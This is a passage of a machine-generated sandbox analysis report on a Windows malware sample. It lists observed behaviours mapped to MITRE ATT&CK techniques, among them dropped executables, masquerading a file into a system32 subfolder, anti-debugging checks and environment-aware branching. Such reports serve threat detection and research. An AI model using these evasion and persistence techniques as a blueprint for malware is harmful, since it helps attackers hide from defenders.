\"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"chrmgspr.exe.67EE4A8A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"chrmgspr.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\chrmgspr.exe]- [targetUID: 00000000-00006072]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67EE524C.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CHRMGSPR.EXE.67EE4A8B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"chrmgspr.exe.67EE4A8A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"chrmgspr.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\chrmgspr.exe]- [targetUID: 00000000-00006072]\n \"DISMHOST.EXE.67EE524C.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CHRMGSPR.EXE.67EE4A8B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\chrmgspr.exe\" to \"%WINDIR%\\system32\\tpxhoiko\\chrmgspr.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00004288-00000105-192571 [PID: 4288]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004288-00000105-407332 [PID: 4288]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004288-00000105-2414508 [PID: 4288]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004288-00000105-2890971 [PID: 4288]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004288-00000105-3327581 [PID: 4288]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004288-00000105-3532217 [PID: 4288]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00004288-00000105-4068654 [PID: 4288]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00004144-00000105-71965 [PID: 4144]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F710000\n \"chrmgspr.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F710000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F710000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00004288-00000105-6921329", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" queries volume information of \"C:\\\" at 00000000-00005760-0000010C-1382478\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" queries volume information of \"C:\\\" at 00000000-00005760-0000010C-1383690\n \"chrmgspr.exe\" queries volume information of \"C:\\\" at 00000000-00004084-0000010C-2605825\n \"chrmgspr.exe\" queries volume information of \"C:\\\" at 00000000-00004084-0000010C-2607101\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004144-0000010C-38484\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004144-0000010C-926721\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004144-0000010C-1341753\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004144-0000010C-1344944", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000c0a726003cfc5300145cf776435cf77608fd5300010000009401240001000000bcfb5300935cf8764083ff76d4a0f77698eda37608fd53000100000001000000f0ff2600000000008cfb5300bcfb530028fc530095e1f376dc120700feffffffd4a0f7761bbe117500000c7700000000 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5cf67643791175ffffffff0c0000004c62f6761f791175ffffffff0c00000064ec120004000000000400000100000078ec12000a0e340000000000 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006b0600000088eaca76ecf91200b344456b88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b40008e23db83bcf51200616b400088000000f822410081a8ca76ecf9120000009001009ee2000002000008000000492e5d00 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebac76101e2c000030fd7f9a5cf87600e0fd7fb0c96d014430fd7f00000000400000003f000000250000000030fd7fa4c96d01c15cf8766082ff76250000000030fd7f9a5cf87600e0fd7fc8c96d015789f7768083ff7613171275d8ebac76 (UID: 00000000-00005760)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000068971a008cf44900145cf776435cf77658f549000100000094011800010000000cf44900935cf8764083ff76d4a0f776ccbcb97658f549000100000001000000f8e31a0000000000dcf349000cf4490078f4490095e1f376384c0700feffffffd4a0f7761bbe117500000c7700000000 (UID: 00000000-00006128)\n \"chrmgspr.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000e0ab6200b8fc2400145cf776435cf77684fd240001000000940160000100000038fc2400935cf8764083ff76d4a0f7760ba9d47684fd2400010000000100000008ba62000000000008fc240038fc2400a4fc240095e1f376cb510700feffffffd4a0f7761bbe117500000c7700000000 (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5cf67643791175ffffffff0c0000004c62f6761f791175ffffffff0c00000064ec120004000000000400000100000078ec12000a0e150000000000 (UID: 00000000-00004084)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006032)\n \"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006072)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" queries volume information of \"C:\\\" at 00000000-00005760-0000010C-1382478\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" queries volume information of \"C:\\\" at 00000000-00005760-0000010C-1383690\n \"chrmgspr.exe\" queries volume information of \"C:\\\" at 00000000-00004084-0000010C-2605825\n \"chrmgspr.exe\" queries volume information of \"C:\\\" at 00000000-00004084-0000010C-2607101\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004144-0000010C-38484\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004144-0000010C-926721\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004144-0000010C-1341753\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004144-0000010C-1344944", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00004144)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000e8001c020000000000000000000000000000000000000500e3001c0200000000000000000000087024000000000020000000000000000000000078492600f86c2400186e2400b8c82600c071240000000000ccf953000000000028fc530095e1f376340a0700feffffffff2bf7769a2af77664c51177b69ff776000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c51177b8c8260064c51177 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e2200fce2120080f4a675000022000000000089f4a6751a6be1830200000070e312006ce3120064e2120068e2120018e4120095e1f376340a0700c0e21200c83ab07534e31200d58ca87570e3120004e3120042a4a675a802b07544e31200d2f4a675080000006ef5a67544f5a675a26ae1830200000070aa716f0000130026bb716f18e31200020000000000130070aa716f48e3120042a4a675a802b0758ce3120010a9716f08000000e6a8716f2086e0830200000070aa716f0000130026bb716fac0e2200780e220058e3120080507d6f18e41200f9f2756f44cd83ec (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000023d619340300000044e56d016e32a482b81600008ce56d01c0e46d01590000000300000048e46d0150e46d0118e66d01d0bb466b5a4681e8feffffff98e56d01bfe5456b23d6193498e56d01cce5456b060000000000f16901000000dfe5456b3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56d01000000008e00000044e66d01feffffffcce56d01cf00f876d600f876e8f39d778e0000004700000044e66d0100000000a0e56d010000000008e66d01 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600ccd6d88244de6d016d828a768c7a2c0004010000 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000370061006600310031003100300039006600330062003200380066003100300034003600630030003100320033006400610061006600360063006500350064006100370035003500640031003900320064003200640064003100330030003500660039002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bf776d4de9d77d8ebac76ac0124000000240000000000000000000000ffffcc000000000000000000000000000000000000000100f700cc00000000000000000000000870240000000000200000000000000000000000 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002400f0872e00000000003e00003e340000c0188a2e00909d2e00a8512c00f00100000000240004000000f0872e00acee6d010464f77638012400e063f77688f89d770000000000002400f8872e006dd1ca76789487826caedd760000000000000000f4010000909d2e00d82f24000100000000002400500124000c000000f8872e00d82f240002000002180000004b220069820000000000000000000000030000004cee6d01820000007f070000000000004b22006902000000c075d276909d2e0000000000c075d27668ee6d01e830240000000000d82f2400c0ee6d01ff2bf776 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000abc5a7b70300000044e56d016e32a482741600008ce56d01c0e46d015b0000000300000048e46d0150e46d0118e66d01d0bb466b5a4681e8feffffff98e56d01bfe5456babc5a7b798e56d01cce5456b820500000000f16901000000dfe5456b3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002400d0aa2e00000000003e00003e340000c0f8ac2e0000b12e00a08b2e00f00100000000240010000000d0aa2e00acee6d010464f77638012400e063f77688f89d770000000000002400d8aa2e006dd1ca76789487826caedd760000000000000000e000000000b12e00d82f24000100000000002400500124000c000000d8aa2e00d82f24000200000218000000820000828200000000000000000000000300000082000082820000000200000000000000d82b00f302000000c075d27628612f0000000000c075d27668ee6d01fc2f240000000000d82f2400c0ee6d01ff2bf776 (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000002d83d8b10300000044e56d016e32a482201700008ce56d01c0e46d015b0000000300000048e46d0150e46d0118e66d01d0bb466b5a4681e8feffffff98e56d01bfe5456b2d83d8b198e56d01cce5456b820500000000f16901000000dfe5456b3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005760)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"IsWow64Process\" with parameter \"5760\" - (UID: 00000000-00005760)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005760)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005760)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00005760-51024-269-0040B211\n Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00004084-55588-273-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"chrmgspr.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004288)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004288)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00005760)\n \"cmd.exe\" called \"FindFirstFileW\" with parameter C:\\ (UID: 00000000-00006032)\n \"cmd.exe\" called \"FindFirstFileW\" with parameter C:\\ (UID: 00000000-00006072)\n \"cmd.exe\" called \"FindNextFileW\" with parameter chrmgspr.exe (UID: 00000000-00006072)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000f6f59f2b5c3e00000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000522eee672e34ee670000000000000000\" - (UID: 00000000-00004144)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": 